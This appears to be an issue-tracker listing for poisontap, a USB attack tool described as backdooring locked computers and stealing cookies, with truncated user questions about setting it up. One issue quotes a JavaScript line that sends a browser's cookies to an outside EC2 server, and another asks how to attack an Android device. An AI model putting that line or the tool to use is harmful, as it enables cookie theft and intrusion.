poisontap icon indicating copy to clipboard operation
poisontap copied to clipboard

Exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js.

Results 90 poisontap issues
Sort by recently updated
recently updated
newest added

Hey, is anybody still active on this? I am trying to attack an android device in my home network. Where do I start? My pie got stolen about a year...

Hello guys! First, thank you for this tool, this is great and I love the idea! I tried to test poisontap on my Pi Zero, but it didn't work. Here...

Sorry for this, but this does not work. I tried many tutorials (all of which used numerous methods), including the official GitHub one, but nothing worked. Nothing is also described;...

Hello, i just wanted to ask how can I configure my Command and Control Server information and how can I configure the cookie data retrieval

Can it be installed on Flipper Zero as bad-USB?

Hi, everything works fine for me and I get the animated screen. My problem is that I can't connect to the raspberry pi after that anymore to check whether cookies...

I've tested this on 3 different micro SD cards, Tried both full and lite raspbian. But following the guide of altering the config.txt and cmdline.txt after flashing (per the modular...

Is this file supposed to be updated to reflect my publicly accessible domain with the correct port i.e. ``` new Image().src='http://ec2-15-185-131-5.us-east-2.compute.amazonaws.com:1337/poisontap/log.php?log='+document.cookies; ``` Also, should this file be changed to look...

Receiving the following issue, any ideas? ![Screen Shot 2019-06-01 at 7 37 38 pm](https://user-images.githubusercontent.com/42858119/58747738-af345b80-84b2-11e9-8c59-d179f6a1ff2b.png)